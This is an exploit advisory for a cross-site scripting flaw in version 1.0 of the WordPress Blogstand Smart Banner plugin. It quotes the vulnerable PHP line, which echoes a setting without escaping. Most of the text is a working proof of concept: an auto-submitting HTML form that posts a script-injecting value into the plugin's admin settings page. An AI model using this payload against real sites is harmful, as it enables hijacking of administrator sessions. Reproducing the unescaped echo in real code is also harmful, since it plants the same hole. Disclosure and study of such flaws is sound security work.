WordPress Blogstand Smart Banner plugin version 1.0 suffers from a cross site scripting vulnerability.
cea022d55ffed5b68965595427bf03deda620745cdb218ae892f0b98c6916a58
######################
# Exploit Title : Wordpress blogstand-smart-banner.1.0 Cross Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://wordpress.org/plugins/blogstand-smart-banner/
# Software Link :
http://downloads.wordpress.org/plugin/blogstand-smart-banner.1.0.zip
# Date : 2014-06-28
# Tested on : Windows 7 / Mozilla Firefox
######################
# Location : http://localhost/wp-admin/options-general.php?page=bs-banner
######################
# Vulnerable code :
<td><input type="text" name="<?php echo $blog_id_field; ?>"
value="<?php echo $blog_id; ?>" /></td>
######################
Exploit Code:
<html>
<body>
<form name="form1" method="post"
action="http://localhost/wp-admin/options-general.php?page=bs-banner">
<input type="hidden" name="blogstand_hidden" value="SET">
<input type="hidden" name="bs_blog_id" value='"/><script>alert(1);</script>'/>
<script language="Javascript">
setTimeout('form1.submit()', 1);
</script>
</form>
</body>
</html>
#####################
Discovered By : ACC3SS
#####################